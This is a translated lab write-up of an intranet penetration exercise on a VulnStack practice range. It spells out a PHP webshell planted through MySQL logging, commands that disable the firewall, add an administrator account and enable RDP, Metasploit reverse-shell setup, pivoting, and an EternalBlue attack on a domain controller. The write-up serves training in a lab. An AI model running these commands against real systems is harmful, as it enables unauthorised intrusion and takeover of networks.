Red Sun Practice 1:
Foreword:
VulnStack is a shooting range knowledge platform built by the Red Sun Security Team. The shooting range environment (CMS, vulnerability management, domain management, etc.) are all simulated based on the business habits of domestic enterprises. All environment design ideas come from ATT & The CK red team evaluates the design model and builds the shooting range and designs the problem from the aspects of environment construction, vulnerability exploitation, intranet collection, lateral movement, channel construction, persistent control, trace cleaning, etc. In order to further learn about intranet penetration, this article will study and record the penetration process of an intranet domain environment shooting range provided by the Red Sun Security Team.
Table of Contents
Red Sun Actual Combat 1:
Foreword:
Environment preparation:
1. Information collection:
1.Port scan:
2. Directory scanning:
2. Web penetration:
1.mysql log import Trojan.
2.Antsword connection
3.yxcms front desk template writing horse
4.Antsword connection
3. Intranet penetration
1.CS part
1.1 Create a user and turn off the firewall
1.2.cs online
1.3. Elevate privileges + collect intranet information
1.4 Collection of intradomain network information
2. Lateral penetration of intranet:
2.1.CS linkage msf
2.2. Determine whether it is a honeypot.
2.3. Static routing configuration
2.4. Use the msf module to scan the LAN port.
2.5. Scan Eternal Blue
2.6. Eternal Blue attacks the domain controller to obtain the shell:
Method 2: CS_psexec moves laterally
Environment preparation:
Environment setup: kali attack machine, win7 target machine (server), win2008 domain controller, win2003 domain member.
Network topology diagram:
Network card configuration: vmware
win7: It can connect to both the external network and the internal network, so two network cards are needed.
win2008:
win2003:
1. Information collection:
1.Port scan:
Scan using kali nmap: discover ports 80 and 3306.
nmap -sV 192.168.31.161
Visit http://192.168.31.161 and find that it is a php probe. From this, we can judge that the service is built by phpstdy.
2. Directory scanning:
Use the dimap tool to scan: find the beifen.rar file and phpmyadmin management page, open beifen.rar and find the source code of yxcms.
—-> Found http://192.168.31.61/yxcms
./dirmap -i http://192.168.31.161 -lcf
Use phpmyadmin blasting attack to discover the weak password root/root.
Log in to the background:
2. Web Penetration:
At this point we have to find a way to upload the Trojan and know the absolute path to upload the Trojan.
1.mysql log import Trojan.
View log status: show variables like '%general%'; Turn on general_log to True: SET GLOBAL general_log='on'; Execute the command to specify the log writing horse: SET GLOBAL general_log_file='C:/phpStudy/www/1.php'; Write a sentence into the horse: SELECT '<?php eval($_POST["cmd"]);?>';
2.Antsword connection
In one sentence, the Trojan demo.php was uploaded successfully. We tried to connect using antsword and the connection was successful.
At this point, the attack on the phpmyadmin page has been completed. Next, visit the http://192.168.31.61/yxcms page for web penetration.
We use a physical machine to access it. You can see in the announcement that the backend address is http://192.168.31.161/yxcms/index.php?r=admin. Visit and log in.
3.yxcms front desk template writing horse
In the front-end template function, I found that I can write a sentence of Trojan in the php file and try to find the path of the Trojan.
Find the path in the backup file:
4.Antsword connection
Antsword connects and the connection is successful!
This is the end of web penetration.
3. Intranet Penetration
The goal is to use the existing control of the Win7 external network server host to penetrate the internal network laterally and seize domain control! Before this, it is necessary to collect intranet information and find out the composition of the intranet domain and network topology.
1.CS part
1.1 Create a user and turn off the firewall
netsh advfirewall set allprofiles state off #winturn off the firewall net user yzy 1qaz@WSX /add #Add account password net localgroup administrators yzy /add #Add as administrator privileges REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f # Open port 3389
Use ipconfig to discover the intranet segment.
1.2.cs is online
Kali opens the CS server and connects to the physical machine.
Here is the three steps of going online: turning on monitoring – making Trojans – uploading and executing the wenbshell tool to complete the online process.
Set file to hidden
1.3. Elevate privileges + collect intranet information
sleep 5 speeds up the response, the lower the number the better Shell systeminfo checks the system version, patches and other information.
Discover domains and patches
The system is online and the privilege escalation is successful.
You can use Mimikatz to directly capture local user passwords:
1.4 Intra-domain network information collection
The main purpose of collecting intranet information is to find domain controllers and other hosts in the domain. First, attach some commands for collecting intranet information:
net view #View other host names in the LAN net config Workstation #View computer name, full name, user name, system version, workstation, domain, login domain net user #View local user list net user /domain #View domain users net localgroup administrators #View the local administrators group (usually there are domain users) net view /domain #View how many domains there are net user username /domain #Get information about the specified domain user net group /domain #View the workgroups in the domain and see how many groups users are divided into (can only be operated on the domain controller) net group group name /domain #View a workgroup in the domain net group "domain admins" /domain #View the name of the domain administrator net group "domain computers" /domain #View other host names in the domain net group "doamin controllers" /domain # View the domain controller host name (there may be multiple)
a. First check how many domains this drone is in, and find that it is only in one domain.
shell net view /domain #View domain environment
b. Check the domain control host, it is owa
net group "domain controllers" /domain #View domain control host
c. Display other hosts in the domain
net view #Display other hosts and IPs in the domain, preferably in the attack view
Organize intranet information:
Domain name: god.org Three hosts in the domain: OWA, ROOT-TVI862UBEH, STU1 (win7) Domain Control: OWA(192.168.52.138) Domain member: ROOT-TVI862UBEH(192.168.52.141) win7 intranet ip: 192.168.52.143
2. Lateral penetration of intranet:
Next, we will use the Win7 springboard to horizontally penetrate domain member hosts and domain control hosts in the internal network domain.
2.1.CS linkage msf
a. Kali first turns on monitoring, sets the payload, and configures IP and port.
use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.31.216 set lport 6666 exploit
b, cs opens new monitoring
Rebound shell to kali.
2.2. Determine whether it is a honeypot.
run post/windows/gather/checkvm #Determine whether it is a virtual machine (honeypot)
2.3. Static routing configuration
run post/multi/manage/autoroute #Load MSF's autoroute module and obtain all network segment information of the current machine run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD #Add target intranet route
2.4. Use the msf module to scan LAN ports.
First use the background command to switch the currently executing Meterpreter session to the background, and then use MSF’s own auxiliary/scanner/portscan/tcp module to scan the intra-domain member host 192.168.52.141. Port 445 found. (Eternal Blue Attempt)
background use auxiliary/scanner/portscan/tcp set rhosts 192.168.52.141 set ports 80,135-139,445,3306,3389 run
Scan the domain control host and find that port 445 also exists, prepare to scan Eternal Blue
2.5. Scan Eternal Blue
search ms17_010 #Search for modules integrated by MSF related to the ms17_010 vulnerability use auxiliary/scanner/smb/smb_ms17_010 # Load scanning exp set rhosts 192.168.52.141 #Set the scanned host IP run #Scan to see if the vulnerability exists
It was found that there are Eternal Blue vulnerabilities:
2.6. Eternal Blue attacks domain control to obtain shell:
! ! A blue screen is very likely to occur here. Fortunately, there is no blue screen and the attack is successful, but the shell is not obtained. . .
My personal consideration here is that there is session 1 in the background, which prevents the shell from being obtained.
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.52.138 run
The picture below is an example of a successful attack:
Method 2: CS_psexec moves laterally
Principle: SMB Beacon:
SMB Beacon uses named pipes to communicate through the parent Beacon. When two Beacons are connected, the child Beacon obtains the task from the parent Beacon and sends it. Because linked Beacons use Windows Named Pipes to communicate, this traffic is encapsulated in the SMB protocol, so SMB beacons are relatively invisible. SMB beacon cannot directly generate usable payloads and can only use psexec or Stageless Payload to go online.
Using smb beacon, a machine that has obtained the beacon can grab the password and perform smb injection to obtain the administrator account password on another machine with port 445 open. If the target machine is not connected to the Internet, you can use smb The beacon brings the target host online.
Conditions of Use:
Hosts with beacons must accept connections on port 445. Only beacons managed by the same Cobalt Strike instance can be linked. You must have administrator privileges on the target host or have credentials with administrator privileges.
Here directly continue to set up the listener, use the captured password to try, use the domain account to log in to other hosts, and create the tunnel first:
The same method is used for domain members: domain members are also online and are also system users.